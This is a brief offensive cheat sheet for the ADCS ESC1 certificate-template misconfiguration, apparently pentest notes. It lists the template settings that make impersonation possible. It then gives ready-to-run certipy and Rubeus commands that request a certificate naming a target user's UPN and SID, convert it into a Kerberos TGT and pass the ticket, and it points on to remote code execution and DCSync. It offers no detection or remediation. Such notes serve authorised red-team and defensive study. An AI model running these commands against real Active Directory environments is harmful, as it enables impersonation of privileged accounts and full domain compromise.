ADCS - ESC 1

Abuse a misconfigured certificate template that lets the requester supply the subject/SAN for an authentication-capable certificate, enabling impersonation of another user or machine.

Vulnerable Template Requirements

• Subject Name: Supply in the request (ENROLLEE_SUPPLIES_SUBJECT).
• SAN: UPN accepted from request (no SAN constraints).
• EKU: Client Authentication, PKINIT Client Authentication, or Smartcard Logon; Any Purpose or no EKU only if policy allows.
• Enrollment Rights: (e.g., Domain Users / Authenticated Users).
• Issuance Controls: Requires Manager Approval = False; Authorized Signatures Required = 0.
• Mapping Posture (DCs): Strong certificate mapping not enforced.

  If Strong Certificate Mapping is Enforced, UPN‑only mapping will fail unless explicit mappings (e.g., altSecurityIdentities) exist.

Attack Path

1. Request a certificate where the SAN/UPN names the target user to impersonate.

certipy req -u '<attacker>@<domain_fqdn>' -p '<password>' -dc-ip <dc_ip> -target <ca_fqdn> -ca '<CA_Name>' -template <TemplateName> -upn '<target@corp.local>' -sid '<target_SID>'

2. Convert PFX to TGT

Linux

certipy auth -pfx <target>.pfx -dc-ip <dc_ip>

Windows

Rubeus.exe asktgt /user:<target_sam_or_upn> /domain:<domain_fqdn> /dc:<dc_fqdn> /certificate:<C:\path\to\target.pfx> /password:<pfx_password> /ptt

3. Use the TGT / impersonate the user.

• Remote Execution Tools

Convert Certificate to Domain Access

• Use the issued PFX to obtain a TGT for the identity named in the SAN/UPN via PKINIT.

• Proceed with operations permitted to that identity.

• Remote Code Execution

• DCSync